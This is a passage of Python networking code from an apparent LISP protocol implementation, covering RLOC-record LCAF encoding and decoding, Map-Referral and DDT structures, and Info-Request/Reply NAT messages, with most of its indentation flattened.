#endif
#endif
if (rloc_entry.rle):
self.rle = rloc_entry.rle
else:
name = rloc_entry.rle_name
if (name and lisp_rle_list.has_key(name)):
self.rle = lisp_rle_list[name]
#endif
#endif
if (rloc_entry.json):
self.json = rloc_entry.json
else:
name = rloc_entry.json_name
if (name and lisp_json_list.has_key(name)):
self.json = lisp_json_list[name]
#endif
#endif
self.priority = rloc_entry.priority
self.weight = rloc_entry.weight
self.mpriority = rloc_entry.mpriority
self.mweight = rloc_entry.mweight
#enddef
def encode_lcaf(self):
lcaf_afi = socket.htons(LISP_AFI_LCAF)
gpkt = ""
if (self.geo):
gpkt = self.geo.encode_geo()
#endif
epkt = ""
if (self.elp):
elp_recs = ""
for elp_node in self.elp.elp_nodes:
afi = socket.htons(elp_node.address.afi)
flags = 0
if (elp_node.eid): flags |= 0x4
if (elp_node.probe): flags |= 0x2
if (elp_node.strict): flags |= 0x1
flags = socket.htons(flags)
elp_recs += struct.pack("HH", flags, afi)
elp_recs += elp_node.address.pack_address()
#endfor
elp_len = socket.htons(len(elp_recs))
epkt = struct.pack("HBBBBH", lcaf_afi, 0, 0, LISP_LCAF_ELP_TYPE,
0, elp_len)
epkt += elp_recs
#endif
rpkt = ""
if (self.rle):
rle_recs = ""
for rle_node in self.rle.rle_nodes:
afi = socket.htons(rle_node.address.afi)
rle_recs += struct.pack("HBBH", 0, 0, rle_node.level, afi)
rle_recs += rle_node.address.pack_address()
if (rle_node.rloc_name):
rle_recs += struct.pack("H", socket.htons(LISP_AFI_NAME))
rle_recs += rle_node.rloc_name + "\0"
#endif
#endfor
rle_len = socket.htons(len(rle_recs))
rpkt = struct.pack("HBBBBH", lcaf_afi, 0, 0, LISP_LCAF_RLE_TYPE,
0, rle_len)
rpkt += rle_recs
#endif
jpkt = ""
if (self.json):
lcaf_len = socket.htons(len(self.json.json_string) + 2)
json_len = socket.htons(len(self.json.json_string))
jpkt = struct.pack("HBBBBHH", lcaf_afi, 0, 0, LISP_LCAF_JSON_TYPE,
0, lcaf_len, json_len)
jpkt += self.json.json_string
jpkt += struct.pack("H", 0)
#endif
spkt = ""
if (self.rloc.is_null() == False and self.keys and self.keys[1]):
spkt = self.keys[1].encode_lcaf(self.rloc)
#endif
npkt = ""
if (self.rloc_name):
npkt += struct.pack("H", socket.htons(LISP_AFI_NAME))
npkt += self.rloc_name + "\0"
#endif
apkt_len = len(gpkt) + len(epkt) + len(rpkt) + len(spkt) + 2 + \
len(jpkt) + self.rloc.addr_length() + len(npkt)
apkt_len = socket.htons(apkt_len)
apkt = struct.pack("HBBBBHH", lcaf_afi, 0, 0, LISP_LCAF_AFI_LIST_TYPE,
0, apkt_len, socket.htons(self.rloc.afi))
apkt += self.rloc.pack_address()
return(apkt + npkt + gpkt + epkt + rpkt + spkt + jpkt)
#enddef
def encode(self):
flags = 0
if (self.local_bit): flags |= 0x0004
if (self.probe_bit): flags |= 0x0002
if (self.reach_bit): flags |= 0x0001
packet = struct.pack("BBBBHH", self.priority, self.weight,
self.mpriority, self.mweight, socket.htons(flags),
socket.htons(self.rloc.afi))
if (self.geo or self.elp or self.rle or self.keys or self.rloc_name \
or self.json):
packet = packet[0:-2] + self.encode_lcaf()
else:
packet += self.rloc.pack_address()
#endif
return(packet)
#enddef
def decode_lcaf(self, packet, nonce):
packet_format = "HBBBBH"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
afi, rsvd1, flags, lcaf_type, rsvd2, lcaf_len = \
struct.unpack(packet_format, packet[:format_size])
lcaf_len = socket.ntohs(lcaf_len)
packet = packet[format_size::]
if (lcaf_len > len(packet)): return(None)
#
# Process AFI-List LCAF.
#
if (lcaf_type == LISP_LCAF_AFI_LIST_TYPE):
while (lcaf_len > 0):
packet_format = "H"
format_size = struct.calcsize(packet_format)
if (lcaf_len < format_size): return(None)
packet_len = len(packet)
afi = struct.unpack(packet_format, packet[:format_size])[0]
afi = socket.ntohs(afi)
if (afi == LISP_AFI_LCAF):
packet = self.decode_lcaf(packet, nonce)
if (packet == None): return(None)
else:
packet = packet[format_size::]
self.rloc_name = None
if (afi == LISP_AFI_NAME):
packet, rloc_name = lisp_decode_dist_name(packet)
self.rloc_name = rloc_name
else:
self.rloc.afi = afi
packet = self.rloc.unpack_address(packet)
if (packet == None): return(None)
self.rloc.mask_len = self.rloc.host_mask_len()
#endif
#endif
lcaf_len -= packet_len - len(packet)
#endwhile
elif (lcaf_type == LISP_LCAF_GEO_COORD_TYPE):
#
# Process Geo-Coordinate LCAF.
#
geo = lisp_geo("")
packet = geo.decode_geo(packet, lcaf_len, rsvd2)
if (packet == None): return(None)
self.geo = geo
elif (lcaf_type == LISP_LCAF_JSON_TYPE):
#
# Process JSON LCAF.
#
packet_format = "H"
format_size = struct.calcsize(packet_format)
if (lcaf_len < format_size): return(None)
json_len = struct.unpack(packet_format, packet[:format_size])[0]
json_len = socket.ntohs(json_len)
if (lcaf_len < format_size + json_len): return(None)
packet = packet[format_size::]
self.json = lisp_json("", packet[0:json_len])
packet = packet[json_len::]
elif (lcaf_type == LISP_LCAF_ELP_TYPE):
#
# Process ELP LCAF.
#
elp = lisp_elp(None)
elp.elp_nodes = []
while (lcaf_len > 0):
flags, afi = struct.unpack("HH", packet[:4])
afi = socket.ntohs(afi)
if (afi == LISP_AFI_LCAF): return(None)
elp_node = lisp_elp_node()
elp.elp_nodes.append(elp_node)
flags = socket.ntohs(flags)
elp_node.eid = (flags & 0x4)
elp_node.probe = (flags & 0x2)
elp_node.strict = (flags & 0x1)
elp_node.address.afi = afi
elp_node.address.mask_len = elp_node.address.host_mask_len()
packet = elp_node.address.unpack_address(packet[4::])
lcaf_len -= elp_node.address.addr_length() + 4
#endwhile
elp.select_elp_node()
self.elp = elp
elif (lcaf_type == LISP_LCAF_RLE_TYPE):
#
# Process RLE LCAF.
#
rle = lisp_rle(None)
rle.rle_nodes = []
while (lcaf_len > 0):
x, y, level, afi = struct.unpack("HBBH", packet[:6])
afi = socket.ntohs(afi)
if (afi == LISP_AFI_LCAF): return(None)
rle_node = lisp_rle_node()
rle.rle_nodes.append(rle_node)
rle_node.level = level
rle_node.address.afi = afi
rle_node.address.mask_len = rle_node.address.host_mask_len()
packet = rle_node.address.unpack_address(packet[6::])
lcaf_len -= rle_node.address.addr_length() + 6
if (lcaf_len >= 2):
afi = struct.unpack("H", packet[:2])[0]
if (socket.ntohs(afi) == LISP_AFI_NAME):
packet = packet[2::]
packet, rle_node.rloc_name = \
lisp_decode_dist_name(packet)
if (packet == None): return(None)
lcaf_len -= len(rle_node.rloc_name) + 1 + 2
#endif
#endif
#endwhile
self.rle = rle
self.rle.build_forwarding_list()
elif (lcaf_type == LISP_LCAF_SECURITY_TYPE):
#
        # Get lisp_keys() data structure so we can parse keys in the Map-
# Reply RLOC-record. Then get the RLOC address.
#
orig_packet = packet
decode_key = lisp_keys(1)
packet = decode_key.decode_lcaf(orig_packet, lcaf_len)
if (packet == None): return(None)
#
# Other side may not do ECDH.
#
cs_list = [LISP_CS_25519_CBC, LISP_CS_25519_CHACHA]
if (decode_key.cipher_suite in cs_list):
if (decode_key.cipher_suite == LISP_CS_25519_CBC):
key = lisp_keys(1, do_poly=False, do_chacha=False)
#endif
if (decode_key.cipher_suite == LISP_CS_25519_CHACHA):
key = lisp_keys(1, do_poly=True, do_chacha=True)
#endif
else:
key = lisp_keys(1, do_poly=False, do_chacha=False)
#endif
packet = key.decode_lcaf(orig_packet, lcaf_len)
if (packet == None): return(None)
if (len(packet) < 2): return(None)
afi = struct.unpack("H", packet[:2])[0]
self.rloc.afi = socket.ntohs(afi)
if (len(packet) < self.rloc.addr_length()): return(None)
packet = self.rloc.unpack_address(packet[2::])
if (packet == None): return(None)
self.rloc.mask_len = self.rloc.host_mask_len()
#
# Some RLOC records may not have RLOC addresses but other LCAF
# types. Don't process security keys because we need RLOC addresses
# to index into security data structures.
#
if (self.rloc.is_null()): return(packet)
rloc_name_str = self.rloc_name
if (rloc_name_str): rloc_name_str = blue(self.rloc_name, False)
#
# If we found no stored key, store the newly created lisp_keys()
# to the RLOC list if and only if a remote public-key was supplied
# in the Map-Reply.
#
stored_key = self.keys[1] if self.keys else None
if (stored_key == None):
if (key.remote_public_key == None):
string = bold("No remote encap-public-key supplied", False)
lprint(" {} for {}".format(string, rloc_name_str))
key = None
else:
string = bold("New encap-keying with new state", False)
lprint(" {} for {}".format(string, rloc_name_str))
key.compute_shared_key("encap")
#endif
#endif
#
# If we have stored-key, the other side received the local public
# key that is stored in variable 'stored_key'. If the remote side
# did not supply a public-key, it doesn't want to do lisp-crypto.
# If it did supply a public key, check to see if the same as
# last time, and if so, do nothing, else we do a rekeying.
#
if (stored_key):
if (key.remote_public_key == None):
key = None
remote = bold("Remote encap-unkeying occurred", False)
lprint(" {} for {}".format(remote, rloc_name_str))
elif (stored_key.compare_keys(key)):
key = stored_key
lprint(" Maintain stored encap-keys for {}".format( \
rloc_name_str))
else:
if (stored_key.remote_public_key == None):
string = "New encap-keying for existing state"
else:
string = "Remote encap-rekeying"
#endif
lprint(" {} for {}".format(bold(string, False),
rloc_name_str))
stored_key.remote_public_key = key.remote_public_key
stored_key.compute_shared_key("encap")
key = stored_key
#endif
#endif
self.keys = [None, key, None, None]
else:
#
# All other LCAFs we skip over and ignore.
#
packet = packet[lcaf_len::]
#endif
return(packet)
#enddef
def decode(self, packet, nonce):
packet_format = "BBBBHH"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
self.priority, self.weight, self.mpriority, self.mweight, flags, \
afi = struct.unpack(packet_format, packet[:format_size])
flags = socket.ntohs(flags)
afi = socket.ntohs(afi)
self.local_bit = True if (flags & 0x0004) else False
self.probe_bit = True if (flags & 0x0002) else False
self.reach_bit = True if (flags & 0x0001) else False
if (afi == LISP_AFI_LCAF):
packet = packet[format_size-2::]
packet = self.decode_lcaf(packet, nonce)
else:
self.rloc.afi = afi
packet = packet[format_size::]
packet = self.rloc.unpack_address(packet)
#endif
self.rloc.mask_len = self.rloc.host_mask_len()
return(packet)
#enddef
def end_of_rlocs(self, packet, rloc_count):
for i in range(rloc_count):
packet = self.decode(packet, None)
if (packet == None): return(None)
#endfor
return(packet)
#enddef
#endclass
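#
# The sketch below is illustrative only and is not called by this module. It
# shows how the fixed 8-byte RLOC-record header handled by encode()/decode()
# above is laid out: priority, weight, mpriority, mweight, a 16-bit flags
# field with the L/p/R bits in the low 3 bits, and the locator AFI. The
# field values are made up.
#
def lisp_rloc_record_header_sketch():
    import struct, socket
    flags = 0x0004 | 0x0001                 # local-bit and reach-bit set
    header = struct.pack("BBBBHH", 1, 100, 255, 0, socket.htons(flags),
        socket.htons(1))                    # AFI 1 is IPv4
    p, w, mp, mw, f, afi = struct.unpack("BBBBHH", header)
    f = socket.ntohs(f)
    return(p, w, mp, mw, bool(f & 0x0004), bool(f & 0x0002), bool(f & 0x0001))
#enddef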
#
# Map-Referral Message Format
#
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# |Type=6 | Reserved | Record Count |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Nonce . . . |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | . . . Nonce |
# +-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | | Record TTL |
# | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# R | Referral Count| EID mask-len | ACT |A|I| Reserved |
# e +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# c |SigCnt | Map Version Number | EID-AFI |
# o +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# r | EID-prefix ... |
# d +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | /| Priority | Weight | M Priority | M Weight |
# | L +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | o | Unused Flags |R| Loc/LCAF-AFI |
# | c +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | \| Locator ... |
# +-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
class lisp_map_referral():
def __init__(self):
self.record_count = 0
self.nonce = 0
#enddef
def print_map_referral(self):
lprint("{} -> record-count: {}, nonce: 0x{}".format( \
bold("Map-Referral", False), self.record_count,
lisp_hex_string(self.nonce)))
#enddef
def encode(self):
first_long = (LISP_MAP_REFERRAL << 28) | self.record_count
packet = struct.pack("I", socket.htonl(first_long))
packet += struct.pack("Q", self.nonce)
return(packet)
#enddef
def decode(self, packet):
packet_format = "I"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
first_long = struct.unpack(packet_format, packet[:format_size])
first_long = socket.ntohl(first_long[0])
self.record_count = first_long & 0xff
packet = packet[format_size::]
packet_format = "Q"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
self.nonce = struct.unpack(packet_format, packet[:format_size])[0]
packet = packet[format_size::]
return(packet)
#enddef
#endclass
#
# This is a DDT cache type data structure that holds information configured
# in the "lisp ddt-authoritative-prefix" and "lisp delegate" commands. The
# self.delegation_set[] is a list of lisp_ddt_node()s.
#
class lisp_ddt_entry():
def __init__(self):
self.eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.group = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.uptime = lisp_get_timestamp()
self.delegation_set = []
self.source_cache = None
self.map_referrals_sent = 0
#enddef
def is_auth_prefix(self):
if (len(self.delegation_set) != 0): return(False)
if (self.is_star_g()): return(False)
return(True)
#enddef
def is_ms_peer_entry(self):
if (len(self.delegation_set) == 0): return(False)
return(self.delegation_set[0].is_ms_peer())
#enddef
def print_referral_type(self):
if (len(self.delegation_set) == 0): return("unknown")
ddt_node = self.delegation_set[0]
return(ddt_node.print_node_type())
#enddef
def print_eid_tuple(self):
return(lisp_print_eid_tuple(self.eid, self.group))
#enddef
def add_cache(self):
if (self.group.is_null()):
lisp_ddt_cache.add_cache(self.eid, self)
else:
ddt = lisp_ddt_cache.lookup_cache(self.group, True)
if (ddt == None):
ddt = lisp_ddt_entry()
ddt.eid.copy_address(self.group)
ddt.group.copy_address(self.group)
lisp_ddt_cache.add_cache(self.group, ddt)
#endif
if (self.eid.is_null()): self.eid.make_default_route(ddt.group)
ddt.add_source_entry(self)
#endif
#enddef
def add_source_entry(self, source_ddt):
if (self.source_cache == None): self.source_cache = lisp_cache()
self.source_cache.add_cache(source_ddt.eid, source_ddt)
#enddef
def lookup_source_cache(self, source, exact):
if (self.source_cache == None): return(None)
return(self.source_cache.lookup_cache(source, exact))
#enddef
def is_star_g(self):
if (self.group.is_null()): return(False)
return(self.eid.is_exact_match(self.group))
#enddef
#endclass
class lisp_ddt_node():
def __init__(self):
self.delegate_address = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.public_key = ""
self.map_server_peer = False
self.map_server_child = False
self.priority = 0
self.weight = 0
#enddef
def print_node_type(self):
if (self.is_ddt_child()): return("ddt-child")
if (self.is_ms_child()): return("map-server-child")
if (self.is_ms_peer()): return("map-server-peer")
#enddef
def is_ddt_child(self):
if (self.map_server_child): return(False)
if (self.map_server_peer): return(False)
return(True)
#enddef
def is_ms_child(self):
return(self.map_server_child)
#enddef
def is_ms_peer(self):
return(self.map_server_peer)
#enddef
#endclass
#
# This is a Map-Request queue used on a Map-Resolver when waiting for a
# Map-Referral to be returned by a DDT-node or a Map-Server.
#
class lisp_ddt_map_request():
def __init__(self, lisp_sockets, packet, eid, group, nonce):
self.uptime = lisp_get_timestamp()
self.lisp_sockets = lisp_sockets
self.packet = packet
self.eid = eid
self.group = group
self.nonce = nonce
self.mr_source = None
self.sport = 0
self.itr = None
self.retry_count = 0
self.send_count = 0
self.retransmit_timer = None
self.last_request_sent_to = None
self.from_pitr = False
self.tried_root = False
self.last_cached_prefix = [None, None]
#enddef
def print_ddt_map_request(self):
lprint("Queued Map-Request from {}ITR {}->{}, nonce 0x{}".format( \
"P" if self.from_pitr else "",
red(self.itr.print_address(), False),
green(self.eid.print_address(), False), self.nonce))
#enddef
def queue_map_request(self):
self.retransmit_timer = threading.Timer(LISP_DDT_MAP_REQUEST_INTERVAL,
lisp_retransmit_ddt_map_request, [self])
self.retransmit_timer.start()
lisp_ddt_map_requestQ[str(self.nonce)] = self
#enddef
def dequeue_map_request(self):
self.retransmit_timer.cancel()
if (lisp_ddt_map_requestQ.has_key(str(self.nonce))):
lisp_ddt_map_requestQ.pop(str(self.nonce))
#endif
#enddef
def print_eid_tuple(self):
return(lisp_print_eid_tuple(self.eid, self.group))
#enddef
#endclass
#
# -------------------------------------------------------------------
# Type (Action field) Incomplete Referral-set TTL values
# -------------------------------------------------------------------
# 0 NODE-REFERRAL NO YES 1440
#
# 1 MS-REFERRAL NO YES 1440
#
# 2 MS-ACK * * 1440
#
# 3 MS-NOT-REGISTERED * * 1
#
# 4 DELEGATION-HOLE NO NO 15
#
# 5 NOT-AUTHORITATIVE YES NO 0
# -------------------------------------------------------------------
#
LISP_DDT_ACTION_SITE_NOT_FOUND = -2
LISP_DDT_ACTION_NULL = -1
LISP_DDT_ACTION_NODE_REFERRAL = 0
LISP_DDT_ACTION_MS_REFERRAL = 1
LISP_DDT_ACTION_MS_ACK = 2
LISP_DDT_ACTION_MS_NOT_REG = 3
LISP_DDT_ACTION_DELEGATION_HOLE = 4
LISP_DDT_ACTION_NOT_AUTH = 5
LISP_DDT_ACTION_MAX = LISP_DDT_ACTION_NOT_AUTH
lisp_map_referral_action_string = [
"node-referral", "ms-referral", "ms-ack", "ms-not-registered",
"delegation-hole", "not-authoritative"]
#
# Info-Request/Reply
#
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# |Type=7 |R| Reserved |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Nonce . . . |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | . . . Nonce |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Key ID | Authentication Data Length |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# ~ Authentication Data ~
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | TTL |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Reserved | EID mask-len | EID-prefix-AFI |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | EID-prefix |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
# Info-Request specific information following the EID-prefix:
#
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = 0 | <Nothing Follows AFI=0> |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
# Info-Reply specific information following the EID-prefix:
#
# +->+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | | AFI = 16387 | Rsvd1 | Flags |
# | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | | Type = 7 | Rsvd2 | 4 + n |
# | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# N | MS UDP Port Number | ETR UDP Port Number |
# A +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# T | AFI = x | Global ETR RLOC Address ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# L | AFI = x | MS RLOC Address ... |
# C +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# A | AFI = x | Private ETR RLOC Address ... |
# F +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | | AFI = x | RTR RLOC Address 1 ... |
# | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | | AFI = x | RTR RLOC Address n ... |
# +->+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
# This encoding will not use authentication so we respond to anyone who
# sends an Info-Request. And the EID-prefix will have AFI=0.
#
class lisp_info():
def __init__(self):
self.info_reply = False
self.nonce = 0
self.private_etr_rloc = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.global_etr_rloc = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.global_ms_rloc = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.ms_port = 0
self.etr_port = 0
self.rtr_list = []
self.hostname = lisp_hostname
#enddef
def print_info(self):
if (self.info_reply):
req_or_reply = "Info-Reply"
rloc = (", ms-port: {}, etr-port: {}, global-rloc: {}, " + \
"ms-rloc: {}, private-rloc: {}, RTR-list: ").format( \
self.ms_port, self.etr_port,
red(self.global_etr_rloc.print_address_no_iid(), False),
red(self.global_ms_rloc.print_address_no_iid(), False),
red(self.private_etr_rloc.print_address_no_iid(), False))
if (len(self.rtr_list) == 0): rloc += "empty, "
for rtr in self.rtr_list:
rloc += red(rtr.print_address_no_iid(), False) + ", "
#endfor
rloc = rloc[0:-2]
else:
req_or_reply = "Info-Request"
hostname = "<none>" if self.hostname == None else self.hostname
rloc = ", hostname: {}".format(blue(hostname, False))
#endif
lprint("{} -> nonce: 0x{}{}".format(bold(req_or_reply, False),
lisp_hex_string(self.nonce), rloc))
#enddef
def encode(self):
first_long = (LISP_NAT_INFO << 28)
if (self.info_reply): first_long |= (1 << 27)
#
# Encode first-long, nonce, key-id longword, TTL and EID mask-len/
# EID-prefix AFI. There is no auth data field since auth len is 0.
#
packet = struct.pack("I", socket.htonl(first_long))
packet += struct.pack("Q", self.nonce)
packet += struct.pack("III", 0, 0, 0)
#
        # Add hostname as a null-terminated string with AFI 17.
#
if (self.info_reply == False):
if (self.hostname == None):
packet += struct.pack("H", 0)
else:
packet += struct.pack("H", socket.htons(LISP_AFI_NAME))
packet += self.hostname + "\0"
#endif
return(packet)
#endif
#
# If Info-Reply, encode Type 7 LCAF.
#
afi = socket.htons(LISP_AFI_LCAF)
lcaf_type = LISP_LCAF_NAT_TYPE
lcaf_len = socket.htons(16)
ms_port = socket.htons(self.ms_port)
etr_port = socket.htons(self.etr_port)
packet += struct.pack("HHBBHHHH", afi, 0, lcaf_type, 0, lcaf_len,
ms_port, etr_port, socket.htons(self.global_etr_rloc.afi))
packet += self.global_etr_rloc.pack_address()
packet += struct.pack("HH", 0, socket.htons(self.private_etr_rloc.afi))
packet += self.private_etr_rloc.pack_address()
if (len(self.rtr_list) == 0): packet += struct.pack("H", 0)
#
# Encode RTR list.
#
for rtr in self.rtr_list:
packet += struct.pack("H", socket.htons(rtr.afi))
packet += rtr.pack_address()
#endfor
return(packet)
#enddef
def decode(self, packet):
orig_packet = packet
packet_format = "I"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
first_long = struct.unpack(packet_format, packet[:format_size])
first_long = first_long[0]
packet = packet[format_size::]
packet_format = "Q"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
nonce = struct.unpack(packet_format, packet[:format_size])
first_long = socket.ntohl(first_long)
self.nonce = nonce[0]
self.info_reply = first_long & 0x08000000
self.hostname = None
packet = packet[format_size::]
#
# Parse key-id, auth-len, auth-data, and EID-record. We don't support
# any of these. On encode, we set 3 longs worth of 0.
#
packet_format = "HH"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
#
# If an LCAF value appears in the key-id field, then this is an
# old style Echo-Reply (that NX-OS implemented).
#
key_id, auth_len = struct.unpack(packet_format, packet[:format_size])
if (auth_len != 0): return(None)
packet = packet[format_size::]
packet_format = "IBBH"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
ttl, rsvd, ml, eid_afi = struct.unpack(packet_format,
packet[:format_size])
if (eid_afi != 0): return(None)
packet = packet[format_size::]
#
# Check if name supplied.
#
if (self.info_reply == False):
packet_format = "H"
format_size = struct.calcsize(packet_format)
if (len(packet) >= format_size):
afi = struct.unpack(packet_format, packet[:format_size])[0]
if (socket.ntohs(afi) == LISP_AFI_NAME):
packet = packet[format_size::]
packet, self.hostname = lisp_decode_dist_name(packet)
#endif
#endif
return(orig_packet)
#endif
#
# Process Info-Reply.
#
packet_format = "HHBBHHH"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
afi, x, lcaf_type, rsvd, lcaf_len, ms_port, etr_port = \
struct.unpack(packet_format, packet[:format_size])
if (socket.ntohs(afi) != LISP_AFI_LCAF): return(None)
self.ms_port = socket.ntohs(ms_port)
self.etr_port = socket.ntohs(etr_port)
packet = packet[format_size::]
#
# Get addresses one AFI at a time.
#
packet_format = "H"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
#
# Get global ETR RLOC address.
#
afi = struct.unpack(packet_format, packet[:format_size])[0]
packet = packet[format_size::]
if (afi != 0):
self.global_etr_rloc.afi = socket.ntohs(afi)
packet = self.global_etr_rloc.unpack_address(packet)
if (packet == None): return(None)
self.global_etr_rloc.mask_len = \
self.global_etr_rloc.host_mask_len()
#endif
#
# Get global MS RLOC address.
#
if (len(packet) < format_size): return(orig_packet)
afi = struct.unpack(packet_format, packet[:format_size])[0]
packet = packet[format_size::]
if (afi != 0):
self.global_ms_rloc.afi = socket.ntohs(afi)
packet = self.global_ms_rloc.unpack_address(packet)
if (packet == None): return(orig_packet)
self.global_ms_rloc.mask_len = self.global_ms_rloc.host_mask_len()
#endif
#
# Get private ETR RLOC address.
#
if (len(packet) < format_size): return(orig_packet)
afi = struct.unpack(packet_format, packet[:format_size])[0]
packet = packet[format_size::]
if (afi != 0):
self.private_etr_rloc.afi = socket.ntohs(afi)
packet = self.private_etr_rloc.unpack_address(packet)
if (packet == None): return(orig_packet)
self.private_etr_rloc.mask_len = \
self.private_etr_rloc.host_mask_len()
#endif
#
# Get RTR list if any.
#
while (len(packet) >= format_size):
afi = struct.unpack(packet_format, packet[:format_size])[0]
packet = packet[format_size::]
if (afi == 0): continue
rtr = lisp_address(socket.ntohs(afi), "", 0, 0)
packet = rtr.unpack_address(packet)
if (packet == None): return(orig_packet)
rtr.mask_len = rtr.host_mask_len()
self.rtr_list.append(rtr)
#endwhile
return(orig_packet)
#enddef
#endclass
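#
# Small illustrative sketch, not called anywhere: how the type and R-bit are
# pulled out of the first longword of an Info-Request/Info-Reply, matching
# the encode()/decode() logic above. Type 7 is LISP_NAT_INFO and bit 27 is
# the R (reply) bit.
#
def lisp_info_first_long_sketch(first_long):
    msg_type = (first_long >> 28) & 0xf
    is_reply = (first_long & 0x08000000) != 0
    return(msg_type, is_reply)
#enddef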
class lisp_nat_info():
def __init__(self, addr_str, hostname, port):
self.address = addr_str
self.hostname = hostname
self.port = port
self.uptime = lisp_get_timestamp()
#enddef
def timed_out(self):
elapsed = time.time() - self.uptime
return(elapsed >= (LISP_INFO_INTERVAL * 2))
#enddef
#endclass
class lisp_info_source():
def __init__(self, hostname, addr_str, port):
self.address = lisp_address(LISP_AFI_IPV4, addr_str, 32, 0)
self.port = port
self.uptime = lisp_get_timestamp()
self.nonce = None
self.hostname = hostname
self.no_timeout = False
#enddef
def cache_address_for_info_source(self):
key = self.address.print_address_no_iid() + self.hostname
lisp_info_sources_by_address[key] = self
#enddef
def cache_nonce_for_info_source(self, nonce):
self.nonce = nonce
lisp_info_sources_by_nonce[nonce] = self
#enddef
#endclass
#------------------------------------------------------------------------------
#
# lisp_concat_auth_data
#
# Take each longword and convert it to printable hex, byte-swapping on
# little-endian (x86) systems and zero-filling longwords that lead with 0.
#
def lisp_concat_auth_data(alg_id, auth1, auth2, auth3, auth4):
if (lisp_is_x86()):
if (auth1 != ""): auth1 = byte_swap_64(auth1)
